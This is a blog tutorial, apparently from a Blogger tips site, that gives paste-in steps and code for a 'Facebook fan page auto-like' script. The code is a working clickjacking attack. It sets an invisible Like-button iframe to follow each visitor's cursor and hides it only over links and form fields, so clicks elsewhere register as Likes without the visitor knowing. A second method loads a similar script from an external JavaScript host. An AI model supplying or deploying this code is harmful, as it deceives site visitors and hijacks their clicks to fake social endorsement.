0


Add Facebook Auto-Like Script In Blogger

  1. Now go to Blogger Dashboard > Template
  2. Download a copy of your template

    Hit Proceed button


  3. Check Expand Widget Templates checkbox
  4. Find  Ctrl + F   below code in your template 
 </head>
7.Now paste the below Code above it.

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"
type="text/javascript">
</script>
<script type='text/javascript'>
function ClickJackFbHide(){
jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).hide();
}
function ClickJackFbShow(){
jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).show();
}
</script>

8.Now Search  for :- 
 </body>
9.And then  paste below code above it.

<!-- budak-technician.blogspot.com/ Fan Page Autolike Script Starts -->
<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity =0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)';  margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden">
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?
href=www.facebook.com/KaunterFarmasi&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe>
   </div>
   <script type="text/javascript">
      jQuery( document ).ready( function() {
          $( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
            jQuery( "#clickjack-button-wrapper-5" ).css( {
               top: e.pageY - 10,
               left: e.pageX + 30
            } );
         } );
                        clickjack_hider();
                        var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
      } );
                        function clickjack_hider(){
         jQuery("input").mouseout(function(){ClickJackFbShow();});
       
jQuery("a").mouseout(function(){ClickJackFbShow();});
         jQuery("button").mouseout(function(){ClickJackFbShow();});
         jQuery("textarea").mouseout(function(){ClickJackFbShow();});
         jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});      
jQuery("object").mouseout(function(){ClickJackFbShow();});
         jQuery("input").mouseover(function(){ClickJackFbHide();});
         jQuery("a").mouseover(function(){ClickJackFbHide();});
         jQuery("button").mouseover(function(){ClickJackFbHide();});
         jQuery("textarea").mouseover(function(){ClickJackFbHide();});
         jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});      
jQuery("object").mouseover(function(){ClickJackFbHide();});
        }
  </script>
 <!-- 
budak-technician.blogspot.com/ Fan Page Autolike Script Ends -->


10.Replace KaunterFarmasi With your Facebook Page's Username ...!
11. Save The Template

Alternative method

 Put Script Auto Like Facebook Fans Page on Blog 

  

  1. Download the Java script file that I have created auto like Here or There 
  2. Extrack file fb.js Facebook_Autolike.rar then open the file with a text editor (Notepad + +) 
  3. Change part _URL_FANS_PAGE_FACEBOOK_ with your facebook fan page url. 
  4. Open http://yourjavascript.com 
  5. Input file that you edit fb.js 
  6. We recommend that you do not check the option (check box) make private so you can put it onany blog / domain.
  7. Enter your email and click upload. 
  8. Wait a while until uploading is complete and then open your email.
  9.  If successful you will receive an email containing a link javascript. 
  10. Put the javascript code caller on your website(To Dashboard> Design> Add a Gadget)
 Sample code like this " <script type="text/javascript" src="http://yourjavascript.com/111120332382/fb.js"></
script> "

Post a Comment

 
Top